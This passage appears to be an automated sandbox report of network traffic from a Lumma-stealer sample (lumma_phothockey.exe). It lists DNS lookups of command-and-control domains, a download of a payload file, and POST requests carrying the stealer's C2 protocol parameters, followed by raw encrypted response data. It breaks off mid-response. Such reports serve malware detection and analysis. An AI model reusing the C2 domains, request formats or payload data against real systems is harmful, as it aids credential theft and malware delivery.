Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 17:01:57.461729050 CET	1.1.1.1	192.168.2.7	0x289d	No error (0)	u1.grapplereturnunstamped.shop		172.67.215.98	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:01:57.461729050 CET	1.1.1.1	192.168.2.7	0x289d	No error (0)	u1.grapplereturnunstamped.shop		104.21.78.33	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:02:23.034348965 CET	1.1.1.1	192.168.2.7	0xf3e9	No error (0)	burnressert.shop		104.21.67.165	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:02:23.034348965 CET	1.1.1.1	192.168.2.7	0xf3e9	No error (0)	burnressert.shop		172.67.178.124	A (IP address)	IN (0x0001)	false
Jan 14, 2025 17:02:29.707066059 CET	1.1.1.1	192.168.2.7	0xd5fe	Name error (3)	15.164.165.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jan 14, 2025 17:02:32.967688084 CET	1.1.1.1	192.168.2.7	0xd849	No error (0)	cegu.shop		185.161.251.21	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

u1.grapplereturnunstamped.shop

burnressert.shop

cegu.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49702	172.67.215.98	443	5416	C:\Users\user\Desktop\lumma_phothockey.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:01:58 UTC	214	OUT	GET /iqqhm.dat HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Host: u1.grapplereturnunstamped.shop Connection: Keep-Alive
2025-01-14 16:01:58 UTC	897	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:01:58 GMT Content-Length: 1185288 Connection: close Accept-Ranges: bytes ETag: "53bd2ec50dc99b6f9d5d447a90957514" Last-Modified: Tue, 14 Jan 2025 10:34:15 GMT Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLChzxeGu9WWOpy0lwCUns87L40SiyRWQNkNXasYnbvcYhk3eDz9MVI0NtSY8dbJdFP6P0L0q11PXYT61JmPaS4XDAHR3C%2BlCLzGZHHAK%2FtCq9NW1xX807Pt9pD7HfD0qumRJYeeGCxdjG87X32%2FF5Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ed9020e024408-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1688&rtt_var=678&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2881&recv_bytes=828&delivery_rate=1729857&cwnd=206&unsent_bytes=0&cid=ee32964af6ee89c4&ts=385&x=0"
2025-01-14 16:01:58 UTC	472	IN	Data Raw: eb d9 b9 e9 e8 46 1f 33 a8 50 9a 35 b2 57 a5 5c d4 2b 45 31 8c e5 6c cf 32 6f 28 44 b1 61 28 62 92 fc e3 8a 59 39 17 19 04 25 7c ca 1e 96 4c d0 65 05 d5 ed 88 07 29 fd 21 31 b8 bd 5f b9 22 82 ca 4e 07 dc ae bf 6b 0b f2 59 39 8a 6d 02 58 9e 74 12 99 73 ec a2 39 50 19 0e ab fc c7 17 f5 24 7e 7e ce 1a b6 4d 07 39 99 9f 60 cd c3 fa 11 5b 92 e6 bc 62 a4 14 07 37 2e 8f 66 e8 ae b6 e4 cb 00 10 23 67 f5 94 d5 4b 5f d2 f6 87 ce 9f 87 78 35 07 d8 14 f0 0d ad f3 43 89 bb 3b b2 28 74 76 a5 30 a1 04 cb 3b 66 0c 4c 93 ac c1 20 ca 07 d1 d1 8b c8 e5 5c 30 0a 09 90 a5 e2 4d e7 4d 86 5d 1c fc ef 96 76 46 32 d0 67 db 85 93 fd fa 8f 93 3e 99 ee d3 d5 f4 d0 5a ec e8 d1 8e d9 8d 84 23 ea 7c f0 b2 09 c0 5b 42 ba b2 3c 03 df 45 84 c5 75 30 99 bd 92 7c 47 9e 90 fe c1 00 62 bc 13 Data Ascii: F3P5W\+E1l2o(Da(bY9%\|Le)!1_"NkY9mXts9P$~~M9`[b7.f#gK_x5C;(tv0;fL \0MM]vF2g>Z#\|[B<Eu0\|Gb
2025-01-14 16:01:58 UTC	1369	IN	Data Raw: 7f ef d8 fb 98 13 0f fd 08 4c 14 5a 85 8e e7 05 87 57 30 ea a8 dd 4c 95 8a c5 61 39 1e f4 e8 82 c5 0d 80 7f 26 57 46 7f cb 32 06 a0 f2 93 27 16 27 df c3 1c 32 f2 7a b5 ed a9 0b 9e dc 2c f6 05 05 13 60 c2 92 8b fb c4 59 7f f1 55 36 c8 80 2a 14 6c 30 41 90 8e 04 4f 4d 4a 07 c9 45 bc 70 90 93 2e 53 39 2c 94 e7 44 84 95 4e b8 32 36 ee d7 55 d8 b8 80 a4 60 a2 00 37 27 55 1d 40 70 2b 60 b8 68 60 a3 99 9d bf 26 b9 32 d5 57 b5 70 49 48 cf b0 28 2a bc c0 8d ca cf b0 bb 12 5b 5f 16 04 4e 82 63 ca 61 b9 7f 48 3b 9b 01 9b f7 54 5e 96 bc ec ac ad df bd be a1 4c c9 dc 51 33 4b e6 87 c0 4c 31 fc e9 4b a6 e7 e5 ad 05 a2 17 a7 09 1b d2 17 11 06 a7 3b ef be 59 c6 fe 4a d0 1f 47 c8 ac 4c 69 4f 8b a5 53 23 6e 69 50 c1 09 9d 05 b1 1d 6c 2f 1c 78 76 bd cb fc 33 ba fd e6 b4 c4 Data Ascii: LZW0La9&WF2''2z,`YU6l0AOMJEp.S9,DN26U`7'U@p+`h`&2WpIH([_NcaH;T^LQ3KL1K;YJGLiOS#niPl/xv3
2025-01-14 16:01:58 UTC	1369	IN	Data Raw: d3 27 e8 34 3a 99 49 98 88 31 55 03 aa df 22 ed b1 68 fe 01 81 2d 5a 3a ef 06 59 4b 0b 86 19 78 c5 81 4e 00 43 20 69 87 d9 04 03 09 03 6f 76 68 3d 4f 7a 8e 56 d2 d3 00 c9 15 58 42 2a ea 5d 9e 72 26 f5 57 08 6e 7f 6c 93 e4 02 1e 54 4b 00 96 dd 2e e7 63 e8 7f 1d f3 de 40 d0 ef c6 66 d8 50 c0 39 40 76 d1 e4 93 61 d4 2c 16 7b 32 1e 03 68 84 fe 19 b5 9d b8 d5 cc 77 72 d0 43 98 b5 4f 6f be 2f e8 1b 53 76 de c5 ad e1 11 e5 80 7d 79 48 19 51 00 14 64 99 5c 6a a1 2c ab 9a 36 43 64 ed 7d d3 26 e6 88 d4 96 51 6f 77 1e 26 d5 38 4e a2 c9 19 ff 8e c4 2a 00 48 e3 69 77 b7 3d ae 6f 46 d7 68 fe 4d a6 da 56 a1 03 30 25 de e7 7a 30 3a a7 71 d2 57 5d de bd 4d 70 68 ea 99 60 c1 d2 5a 3d 56 eb 3b e0 d7 10 92 11 7a 1a 35 86 c9 dd 28 8f f0 06 1a 84 2c bb d1 73 20 09 52 84 d5 40 Data Ascii: '4:I1U"h-Z:YKxNC iovh=OzVXB]r&WnlTK.c@fP9@va,{2hwrCOo/Sv}yHQd\j,6Cd}&Qow&8NHiw=oFhMV0%z0:qW]Mph`Z=V;z5(,s R@
2025-01-14 16:01:58 UTC	1369	IN	Data Raw: d7 56 b8 aa bb 5e bf 4a 5c 5a a7 bf b2 b0 a0 ff c8 9c 8a 1d 38 e7 3c 7d 0c bd bc 5d 3a 18 3c 98 d0 3c 74 3e 81 8f f1 18 bf 5f ea 93 6a 0b 50 45 83 6a 10 bb 2f 89 b4 e7 00 91 42 12 cb 5e 2a 21 c0 32 64 ad 93 b3 f3 6c 2b d5 4b 44 65 24 21 f7 2f 6b 26 73 b7 86 e9 ec 54 d1 e2 e9 6b 04 91 40 b7 4b 8c bf 6f 06 fd 53 d5 b5 3b 57 c9 13 3c 7f b8 8d 8d 4a 70 67 e8 3e af 87 77 cd 09 aa ed 9f 6c c4 93 6e b0 14 33 4e 6c f5 52 af c9 71 47 93 b6 af 41 b6 a2 63 b8 d4 33 fd 3e f6 f6 38 92 d9 9d 8a 84 38 e7 c9 b3 f4 de 3a fc 50 5f e9 28 3c aa 21 fd 5c 9e 24 dc 3c f3 70 c2 c3 dc 9b 67 d3 61 cc ce d6 a8 ff 0b fd 30 02 d8 9c db 65 f1 6d 28 4c 90 d9 0a 37 76 04 a9 ec de e4 84 b2 c8 8b dd 58 f4 7b 2b 62 04 3f 19 8d d2 1f 3a 9c 04 b0 be 46 51 3c 56 a2 52 5c f7 83 a7 f4 b3 af 93 Data Ascii: V^J\Z8<}]:<<t>_jPEj/B^*!2dl+KDe$!/k&sTk@KoS;W<Jpg>wln3NlRqGAc3>88:P_(<!\$<pga0em(L7vX{+b?:FQ<VR\
2025-01-14 16:01:58 UTC	1369	IN	Data Raw: 62 b4 fe fa 99 d9 88 00 76 0c 43 c0 af dc f0 fc 40 b5 f7 1c 1d c8 d0 84 35 07 c9 20 8e b7 15 95 00 81 0f de d8 76 75 4c 9f ae e2 5d 60 dd b5 e8 6e 54 b1 9b 31 94 2f e4 a0 71 c2 66 19 31 62 1b 34 cf 5e 93 7a fb 44 fb 43 99 ae e7 3f bb 2b ab 61 fe b6 d1 ce ab 37 df bc 77 7f 06 7d 34 00 0d 93 2f bb d4 85 88 3d d9 51 c0 3c 6a 77 c1 64 5e da 70 a8 c9 11 c6 3d dd ec c2 99 86 72 93 61 99 72 b9 b0 94 ab a1 59 38 7a eb 83 15 b7 6c 34 ee 62 ab 9e 3f 3a 14 d0 88 a8 73 34 c3 a7 7c 36 3b ef c2 20 01 1f d2 c6 3a 10 82 e5 c3 09 36 e1 ff b0 95 a3 9d 08 ce 42 50 e1 c1 bb 27 07 2c 1a 02 38 19 eb 99 84 11 82 85 cc 5c e0 f1 0e 90 af b2 86 2f db af cf 5b 49 05 bd 95 ea 26 a3 b6 ca b3 f9 61 3b 2d bc c8 a7 8f ec e2 26 05 b6 b0 ff eb 61 c5 56 da d6 7b 22 ca 0b 68 85 c4 bd 2c 97 Data Ascii: bvC@5 vuL]`nT1/qf1b4^zDC?+a7w}4/=Q<jwd^p=rarY8zl4b?:s4\|6; :6BP',8\/[I&a;-&aV{"h,
2025-01-14 16:01:58 UTC	1369	IN	Data Raw: 8a ad fa a8 34 19 4a d5 e2 65 1c f3 39 96 fe 8e ab 49 82 93 1c 9c 44 a6 d6 f6 fb c6 51 84 47 7c 70 cf a2 9f 05 ed e7 70 03 3b 89 e9 fb 23 2a fd 4f 60 46 c7 a6 3f 69 c1 0f 5c 78 1d 5a 0b 2c 5b 68 72 40 4b 14 cb b5 76 ec 0b 78 b7 21 d6 86 a1 d6 24 bb 86 b1 6a 28 c7 49 29 25 d6 bb 93 62 4e 5c 49 5c ea b6 9a a1 20 2d 0b 17 51 fe c7 30 2b da a3 52 d2 aa 31 4e 51 58 55 6f 87 33 34 83 15 6e 96 6f 78 67 40 e3 82 69 00 1d e5 0a e6 28 2b 9a 34 62 df bf 8f f2 40 62 4f 4f d7 19 34 77 54 20 ed 5c 75 b1 7d ef bf 0c 80 6c a4 9b b1 df cb 6d 8c f3 30 3e 16 b4 32 d4 ca 50 c7 fe 47 81 ef b1 6a 80 6f c6 8f 3d 93 88 af 77 fe 23 40 49 63 69 00 e4 02 84 d6 c2 b7 6f ca 20 7b d9 1d b9 32 d0 a9 dd b2 51 52 d7 c6 49 83 88 81 74 00 d7 41 64 1f 33 03 01 41 da e0 85 65 63 22 a4 95 54 Data Ascii: 4Je9IDQG\|pp;#*O`F?i\xZ,[hr@Kvx!$j(I)%bN\I\ -Q0+R1NQXUo34noxg@i(+4b@bOO4wT \u}lm0>2PGjo=w#@Icio {2QRItAd3Aec"T
2025-01-14 16:01:58 UTC	1369	IN	Data Raw: 39 6b 6b ee c1 41 aa f9 49 fb d6 a4 39 04 e7 d3 69 31 d0 ba e1 f2 a6 00 64 e5 c7 6c c2 35 a5 5a b3 99 a3 89 6c 7a 86 f6 24 81 09 12 68 e1 c7 c7 2b db 84 a9 77 77 3e 6c 59 00 e7 d3 23 bf 9f 01 ac 71 95 2a 83 36 5b e7 e1 81 9f 18 13 1b 9d 84 e3 f0 ed ac e0 18 d0 37 95 9e c0 ae 6b 53 2d 60 dc 9d 5c 88 6e 8b 26 0b f8 c6 42 3c 38 75 7d df e5 d5 3c 98 a0 43 de 2c d2 c4 ae 2d 7c f4 42 63 19 b2 81 61 23 52 62 53 a4 1c 14 ce 35 0a d9 2c c0 06 ef bd 19 08 23 f9 ce e6 a3 ab dd 91 64 07 a5 12 e9 e3 9b cd 60 8f b9 6f fc 08 d0 da 08 75 53 96 4a e7 d6 08 83 c3 64 6b 36 69 08 e4 86 c6 3b e9 8f bb 7b 8d 21 ba 31 fc 94 59 bd 18 f0 3f 96 11 7e f3 62 17 7a 2a 4a cd 70 13 14 7d d2 25 9e 81 26 1f 9a 89 d4 f8 1c 69 b8 97 c5 a5 21 ae 6b e2 a3 da 0f e4 f3 79 b9 55 81 66 d0 20 0f Data Ascii: 9kkAI9i1dl5Zlz$h+ww>lY#q6[7kS-`\n&B<8u}<C,-\|Bca#RbS5,#d`ouSJdk6i;{!1Y?~bzJp}%&i!kyUf
2025-01-14 16:01:58 UTC	1369	IN	Data Raw: 9c f4 da 46 cb 92 a9 a8 3b d6 39 65 ad 6f ef 0c d5 8b c4 d2 26 f2 7d 1b dc cf af f8 6f aa 44 c9 fa ee c1 36 11 a0 7b 30 d7 a4 87 bd d6 b8 52 88 10 fd c0 36 e6 8d 11 86 2b 16 da 61 d7 8e 59 5c 4b 57 b6 e5 18 b7 e8 63 f2 e1 a4 11 cb f5 cc 77 45 c4 e0 01 ce 8a c4 4d 62 3f 7a e7 0c 54 24 db f8 b7 9b 95 c2 48 08 b2 cf ba d5 d1 e3 3d 51 cf 51 22 ce b7 c8 53 17 68 dc f5 31 34 e0 f0 1e c3 55 8d e9 2a 0e 1a 60 0b 20 e2 37 4c b5 d8 fa f2 12 a8 fd 87 31 76 dc 46 d9 17 fa f3 50 71 c3 b1 d7 fe f0 4b cd 18 c7 2f 2e 9a 16 cf a3 a0 41 fc 02 09 cb cb 49 54 e4 0b b0 e6 29 17 6f 96 c1 b2 3a b3 e6 b2 49 88 f2 00 a1 b3 6f a6 98 1d 1a 8a 29 fb 7f 84 4b 7f 39 53 80 ff 5a 21 58 94 0d e4 28 4e 64 54 ac 9c b9 d7 68 15 54 a9 3c 4d a0 6b f1 ec 38 2a 18 13 9c c2 aa 57 16 bb b6 3d 67 Data Ascii: F;9eo&}oD6{0R6+aY\KWcwEMb?zT$H=QQ"Sh14U` 7L1vFPqK/.AIT)o:Io)K9SZ!X(NdThT<Mk8W=g
2025-01-14 16:01:58 UTC	1369	IN	Data Raw: 5f d9 a6 35 92 fd 6a f3 1e a0 6f e6 fe a9 f1 02 a1 96 00 c1 97 fa e1 13 8e 0c 18 a5 02 a9 01 d0 01 e0 c2 3c dd 7e 21 db 44 e4 85 06 02 e5 58 cc 1f 21 ec 0c e9 63 cb 54 af cf 21 d8 2a bf 7f 01 3b ec 6a 0f 9e af c4 2f a7 35 f6 f0 1b c1 78 1f 6c d5 ea e4 1e 61 82 aa 19 f8 5c ad 81 17 76 3a 25 61 81 67 36 c0 4a 86 28 8e 92 2f a4 d1 00 63 2a 86 04 b8 5d c9 18 53 8a 12 6d 12 9e 63 65 83 21 06 67 0d 56 3e ab 00 22 f2 04 4f a1 8a 6b a2 a0 85 c7 ea b2 4d 2c b1 f9 2d 19 8f c3 3c 9a 46 b5 8e 90 48 0a 5f db 43 e2 ad 5a 5f 36 32 62 3e 7d ca 6f 4c 90 dd 6d f0 05 50 1f c5 62 0b ca 3c 68 b3 78 68 f0 87 c1 01 d5 86 a7 ab 03 95 dd a4 26 ba d0 4b b5 11 13 45 36 65 ae fc 20 d9 6f 21 4b 57 33 1b 8a 74 d8 9a 55 eb 07 1c 79 e7 d7 fa cd 5c 2e f5 98 aa aa 5d 0f b8 a2 d5 86 7a cf Data Ascii: _5jo<~!DX!cT!;j/5xla\v:%ag6J(/c]Smce!gV>"OkM,-<FH_CZ_62b>}oLmPb<hxh&KE6e o!KW3tUy\.]z
2025-01-14 16:01:58 UTC	1369	IN	Data Raw: 0b 3e 7b ca 48 a0 df 39 a0 01 b4 d7 9d b7 59 81 af 71 4b 00 53 3b d3 5f bb 09 b1 36 33 12 a2 a9 36 c6 8e a8 a4 7a 81 66 7f 29 1a 3b 83 a3 b0 20 c8 b8 20 71 0b f9 2f b7 bd 33 c1 45 bd 7a ee b6 c5 9e b9 06 ba 57 b5 37 52 98 d0 b9 a5 7d 6e f1 4d ad ca ea 00 18 cc 19 fe 06 f6 5a 8b 8d 30 35 9d 39 bf e9 52 2c 66 49 e4 55 08 ee c4 3f 02 3d 66 42 2c 2a f2 d0 af 44 d2 c3 86 d2 1c 4d f4 8b d9 a6 e9 3e b1 a6 d8 12 32 52 6d 02 fd 14 b5 0e 77 bc f4 9c 4b 9c 8b 93 07 fa c1 3d bf 8a 36 bd 06 bd 2f 52 e6 0b a3 20 1f 1d 5e ea 16 10 73 58 f0 2c 2f d0 c4 a4 29 21 1b 79 09 9d f5 d4 e4 63 0b d3 51 55 12 09 d8 73 b0 3e b7 0b 1e 22 40 8f 65 f0 e2 c9 8a 3e f5 c7 92 87 f1 8c 7e 8d 53 86 32 23 00 75 6e f7 d9 82 45 21 f0 23 d0 33 e3 20 6f c3 ca 5f 72 bd 89 d3 70 a2 6c ea bb 99 89 Data Ascii: >{H9YqKS;_636zf); q/3EzW7R}nMZ059R,fIU?=fB,*DM>2RmwK=6/R ^sX,/)!ycQUs>"@e>~S2#unE!#3 o_rpl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49830	104.21.67.165	443	5392	C:\Users\user\Desktop\lumma_phothockey.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:02:23 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: burnressert.shop
2025-01-14 16:02:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-14 16:02:24 UTC	1125	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bk6bv5flknq2osniqehop7mg8g; expires=Sat, 10 May 2025 09:49:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5A5NPxjJKFRkReAOaFgy%2BWUWlaERNw9WqTOMMkTbICPy%2B256fDt0viPh0CZ2sciZVjwLSy3Nc6GceBR%2FrEeprh1prPZ%2BuaCUMvPMwCw3%2FsU04UduYab6d1Hm0yuNZI9FPlzi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ed9a1daa141bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1580&rtt_var=615&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=907&delivery_rate=1747456&cwnd=210&unsent_bytes=0&cid=83c6f865194267fd&ts=525&x=0"
2025-01-14 16:02:24 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-14 16:02:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49836	104.21.67.165	443	5392	C:\Users\user\Desktop\lumma_phothockey.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:02:24 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: burnressert.shop
2025-01-14 16:02:24 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--SHELLS&j=aa77e78b6b0dd1b2226e7b799532ab3a
2025-01-14 16:02:25 UTC	1119	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:02:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8qhhmktnp5qifo7c2vgi83g5n4; expires=Sat, 10 May 2025 09:49:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UTmpsYQodDZcdCW0GaA%2BcbnkkR0VLfGwF6jUCbpzfxFlmm48FvArXvl7CWFupycxy9UzoAxetV98lGgByHwVF%2BgSxzo3rPoDrCQMFvNGBITdVBynvsWEZqkBzXyaXfgmUepQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ed9a7db430cae-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1579&rtt_var=882&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=980&delivery_rate=1849271&cwnd=252&unsent_bytes=0&cid=a7749c751ed99d84&ts=520&x=0"
2025-01-14 16:02:25 UTC	250	IN	Data Raw: 63 34 31 0d 0a 4c 71 32 49 72 52 6a 52 74 51 6f 50 62 38 47 59 36 48 59 4f 62 4b 4c 65 58 2b 39 76 78 48 4e 53 52 6e 66 4a 42 43 6e 42 6b 50 74 56 6a 2f 36 50 49 75 57 5a 4b 48 77 4b 34 36 4b 4f 46 32 49 66 78 2f 4a 39 6a 67 76 6d 53 54 51 6e 47 37 70 68 42 65 50 6d 6c 67 79 58 37 73 78 30 6f 74 41 6d 4c 51 71 35 75 74 49 74 64 55 37 48 73 48 33 56 54 61 45 5a 4d 43 63 62 71 32 56 43 72 75 43 58 54 63 58 6b 79 6e 43 30 31 6d 35 75 41 36 7a 39 6a 52 4e 76 42 73 79 33 4d 6f 63 43 35 6c 39 77 49 77 33 72 50 67 75 4d 39 59 39 50 34 4f 6e 65 63 2f 50 49 4a 6e 52 4e 70 50 62 4b 54 43 77 4e 78 37 77 7a 69 51 75 76 47 7a 6f 75 45 36 70 67 51 37 48 35 6e 55 62 46 36 73 6c 78 76 74 39 36 59 77 6d 72 39 6f 73 5a 62 30 36 4f 2f 44 71 56 54 66 35 52 59 Data Ascii: c41Lq2IrRjRtQoPb8GY6HYObKLeX+9vxHNSRnfJBCnBkPtVj/6PIuWZKHwK46KOF2Ifx/J9jgvmSTQnG7phBePmlgyX7sx0otAmLQq5utItdU7HsH3VTaEZMCcbq2VCruCXTcXkynC01m5uA6z9jRNvBsy3MocC5l9wIw3rPguM9Y9P4Onec/PIJnRNpPbKTCwNx7wziQuvGzouE6pgQ7H5nUbF6slxvt96Ywmr9osZb06O/DqVTf5RY
2025-01-14 16:02:25 UTC	1369	IN	Data Raw: 78 59 57 75 6e 64 65 72 75 4b 66 44 4e 43 6b 31 6a 71 30 32 79 67 31 54 61 76 32 68 42 46 76 41 63 65 39 50 5a 38 43 70 68 49 34 4c 42 47 68 61 55 53 73 2f 4a 4e 4c 78 2b 50 49 64 62 54 66 62 6d 49 4f 34 37 54 4b 45 33 52 4f 6d 50 77 64 6e 51 36 6c 42 54 30 31 56 62 51 6f 55 75 50 31 6c 51 79 58 71 73 6c 30 73 74 70 6f 66 77 57 6f 38 59 38 47 5a 77 66 4e 73 54 32 41 42 36 6b 53 4d 43 4d 66 6f 57 6c 42 70 2f 2b 55 53 73 2f 71 6a 7a 54 7a 30 48 41 74 56 65 50 5a 6a 77 52 72 41 74 62 2b 42 38 30 53 36 41 68 77 49 78 6e 72 50 67 75 72 39 35 70 50 78 4f 58 4d 63 72 6a 46 61 48 38 4c 72 76 2b 59 45 6d 6b 41 79 72 38 76 68 77 4f 67 45 6a 6b 76 48 4b 35 68 54 2b 4f 38 32 55 76 58 71 70 63 36 6b 74 70 6a 59 51 65 30 2b 73 6f 4c 49 68 65 41 75 7a 48 4e 56 65 59 56 Data Ascii: xYWunderuKfDNCk1jq02yg1Tav2hBFvAce9PZ8CphI4LBGhaUSs/JNLx+PIdbTfbmIO47TKE3ROmPwdnQ6lBT01VbQoUuP1lQyXqsl0stpofwWo8Y8GZwfNsT2AB6kSMCMfoWlBp/+USs/qjzTz0HAtVePZjwRrAtb+B80S6AhwIxnrPgur95pPxOXMcrjFaH8Lrv+YEmkAyr8vhwOgEjkvHK5hT+O82UvXqpc6ktpjYQe0+soLIheAuzHNVeYV
2025-01-14 16:02:25 UTC	1369	IN	Data Raw: 55 6d 54 4c 75 79 77 51 7a 6c 36 64 74 35 75 5a 56 64 62 67 4f 74 2f 5a 78 55 63 30 44 5a 2f 44 71 42 54 66 35 52 50 53 55 64 72 58 52 45 72 76 47 58 51 73 44 76 77 48 4b 7a 31 32 56 6f 43 61 6a 78 69 52 6c 6f 48 4d 71 38 4e 59 67 4d 72 42 74 77 61 6c 57 73 66 67 76 37 73 71 68 62 78 4b 6a 36 65 62 33 5a 62 33 74 4e 76 4c 53 54 56 47 73 43 67 4f 52 39 67 41 57 6a 46 44 38 6c 48 36 56 6a 51 61 2f 36 6c 30 2f 64 35 63 74 36 76 39 39 69 59 41 4f 6e 38 6f 4d 66 5a 77 6a 41 76 54 66 4e 51 2b 59 57 4b 47 52 4e 36 31 4a 4d 72 2f 2b 57 44 76 72 70 77 58 53 30 77 53 68 79 51 37 71 36 6a 52 67 73 56 6f 43 77 4e 49 30 47 72 42 55 77 49 78 69 75 5a 55 79 67 2f 35 35 47 77 65 33 4c 64 72 72 61 62 6d 30 4b 70 2f 2b 59 45 57 55 43 7a 50 78 7a 7a 51 71 2b 55 57 68 6b 4f Data Ascii: UmTLuywQzl6dt5uZVdbgOt/ZxUc0DZ/DqBTf5RPSUdrXRErvGXQsDvwHKz12VoCajxiRloHMq8NYgMrBtwalWsfgv7sqhbxKj6eb3Zb3tNvLSTVGsCgOR9gAWjFD8lH6VjQa/6l0/d5ct6v99iYAOn8oMfZwjAvTfNQ+YWKGRN61JMr/+WDvrpwXS0wShyQ7q6jRgsVoCwNI0GrBUwIxiuZUyg/55Gwe3Ldrrabm0Kp/+YEWUCzPxzzQq+UWhkO
2025-01-14 16:02:25 UTC	156	IN	Data Raw: 37 73 70 42 46 33 65 54 42 63 37 37 52 59 47 6f 44 72 76 47 4d 48 32 73 4a 78 72 45 31 67 41 69 6c 45 44 51 75 42 36 68 74 51 61 37 34 32 51 4b 50 37 64 63 36 36 35 64 50 59 53 53 7a 34 5a 67 43 4c 42 47 4f 70 58 32 4b 41 65 5a 4a 63 43 63 61 6f 6d 6c 44 71 2f 32 57 53 4d 48 73 79 58 65 32 32 47 4a 2f 42 61 33 33 67 52 74 6e 48 4d 43 78 4f 59 45 4a 72 68 6f 36 5a 46 76 72 59 56 50 6a 71 74 6c 35 77 75 58 50 65 61 57 58 64 79 4d 55 34 2f 32 47 56 44 52 4f 7a 0d 0a Data Ascii: 7spBF3eTBc77RYGoDrvGMH2sJxrE1gAilEDQuB6htQa742QKP7dc665dPYSSz4ZgCLBGOpX2KAeZJcCcaomlDq/2WSMHsyXe22GJ/Ba33gRtnHMCxOYEJrho6ZFvrYVPjqtl5wuXPeaWXdyMU4/2GVDROz
2025-01-14 16:02:25 UTC	1369	IN	Data Raw: 34 32 35 66 0d 0a 4c 49 39 67 67 47 71 47 6a 67 6c 47 61 56 68 54 71 72 36 6b 56 37 4f 37 73 64 37 76 64 68 70 61 51 69 6d 2f 6f 30 51 61 67 47 41 38 6e 32 4b 46 65 5a 4a 63 41 73 79 6e 69 52 71 6d 62 4b 47 41 74 61 71 79 48 62 7a 6a 79 68 68 44 71 2f 79 68 52 4a 6c 41 73 71 31 4e 6f 45 47 6f 68 30 35 49 52 4f 71 59 30 36 69 39 70 56 47 79 65 6e 4d 64 62 7a 59 59 43 31 44 34 2f 32 53 56 44 52 4f 35 61 73 32 67 77 76 6d 44 6e 34 39 56 61 78 71 43 2f 75 79 6c 55 58 4a 37 4d 70 32 73 74 46 67 61 41 57 6e 2b 34 77 53 62 77 48 45 75 54 79 43 43 61 6f 66 4f 69 55 55 70 32 31 45 71 50 66 5a 41 6f 2f 74 31 7a 72 72 